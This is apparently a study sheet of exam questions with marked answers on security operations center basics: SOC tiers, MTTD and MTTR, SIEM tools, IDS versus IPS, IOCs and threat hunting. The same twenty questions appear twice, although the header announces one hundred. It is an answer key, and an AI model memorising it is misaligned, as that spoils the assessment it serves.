CSRE 2026/2027 Syllabus – Core Domains
Covered:
1. SOC Architecture & Strategy
2. Threat Detection & Analytics
3. Incident Response & Forensics
4. Automation & Orchestration (SOAR)
5. Threat Intelligence Integration
6. Continuous Monitoring & Metrics
7. Cloud & Hybrid SOC
8. Legal, Compliance & Reporting
Questions 1–100
1. What is the primary purpose of a SOC?
ANSWER ✓ To continuously monitor, detect, analyze, and respond to cybersecurity
incidents.
2. Name three core functions of a SOC.
ANSWER ✓ Monitor, detect, and respond.
3. Which framework is most commonly used to map SOC processes?
ANSWER ✓ NIST Cybersecurity Framework (CSF) or MITRE ATT&CK.
4. What is the difference between a Tier 1 and Tier 2 SOC analyst?
ANSWER ✓ Tier 1 triages alerts; Tier 2 investigates and deep-dives.
5. Define “alert fatigue” in SOC.
ANSWER ✓ Desensitization due to excessive false positives, leading to missed real
threats.
6. What is MTTD?
ANSWER ✓ Mean Time to Detect.
, 7. What is MTTR in SOC context?
ANSWER ✓ Mean Time to Respond/Recover.
8. Which SOC metric measures efficiency of handling incidents?
ANSWER ✓ Mean Time to Contain (MTTC).
9. Name a SIEM tool commonly used in SOCs.
ANSWER ✓ Splunk, Microsoft Sentinel, or QRadar.
10. What is a playbook in SOAR?
ANSWER ✓ Predefined automated response workflow for specific incidents.
11. Which MITRE ATT&CK tactic is the first step for most attackers?
ANSWER ✓ Reconnaissance.
12. What is a false positive?
ANSWER ✓ An alert triggered by benign activity but flagged as malicious.
13. What is a true negative?
ANSWER ✓ No threat detected and no alert triggered — expected state.
14. Define “threat hunting.”
ANSWER ✓ Proactive search for hidden threats not detected by automated tools.
15. What is a hypothesis-driven hunt?
ANSWER ✓ Hunting based on a specific threat scenario or TTP.
16. Which model describes attacker lifecycle?
ANSWER ✓ Cyber Kill Chain (Lockheed Martin).
17. What is the difference between IDS and IPS?
ANSWER ✓ IDS detects; IPS detects and blocks.
18. What does EDR stand for?
ANSWER ✓ Endpoint Detection and Response.
19. What is an IOC?
ANSWER ✓ Indicator of Compromise — forensic artifact of a breach.
20. What is an IOA?
ANSWER ✓ Indicator of Attack — behavioral pattern.
Covered:
1. SOC Architecture & Strategy
2. Threat Detection & Analytics
3. Incident Response & Forensics
4. Automation & Orchestration (SOAR)
5. Threat Intelligence Integration
6. Continuous Monitoring & Metrics
7. Cloud & Hybrid SOC
8. Legal, Compliance & Reporting
Questions 1–100
1. What is the primary purpose of a SOC?
ANSWER ✓ To continuously monitor, detect, analyze, and respond to cybersecurity
incidents.
2. Name three core functions of a SOC.
ANSWER ✓ Monitor, detect, and respond.
3. Which framework is most commonly used to map SOC processes?
ANSWER ✓ NIST Cybersecurity Framework (CSF) or MITRE ATT&CK.
4. What is the difference between a Tier 1 and Tier 2 SOC analyst?
ANSWER ✓ Tier 1 triages alerts; Tier 2 investigates and deep-dives.
5. Define “alert fatigue” in SOC.
ANSWER ✓ Desensitization due to excessive false positives, leading to missed real
threats.
6. What is MTTD?
ANSWER ✓ Mean Time to Detect.
, 7. What is MTTR in SOC context?
ANSWER ✓ Mean Time to Respond/Recover.
8. Which SOC metric measures efficiency of handling incidents?
ANSWER ✓ Mean Time to Contain (MTTC).
9. Name a SIEM tool commonly used in SOCs.
ANSWER ✓ Splunk, Microsoft Sentinel, or QRadar.
10. What is a playbook in SOAR?
ANSWER ✓ Predefined automated response workflow for specific incidents.
11. Which MITRE ATT&CK tactic is the first step for most attackers?
ANSWER ✓ Reconnaissance.
12. What is a false positive?
ANSWER ✓ An alert triggered by benign activity but flagged as malicious.
13. What is a true negative?
ANSWER ✓ No threat detected and no alert triggered — expected state.
14. Define “threat hunting.”
ANSWER ✓ Proactive search for hidden threats not detected by automated tools.
15. What is a hypothesis-driven hunt?
ANSWER ✓ Hunting based on a specific threat scenario or TTP.
16. Which model describes attacker lifecycle?
ANSWER ✓ Cyber Kill Chain (Lockheed Martin).
17. What is the difference between IDS and IPS?
ANSWER ✓ IDS detects; IPS detects and blocks.
18. What does EDR stand for?
ANSWER ✓ Endpoint Detection and Response.
19. What is an IOC?
ANSWER ✓ Indicator of Compromise — forensic artifact of a breach.
20. What is an IOA?
ANSWER ✓ Indicator of Attack — behavioral pattern.
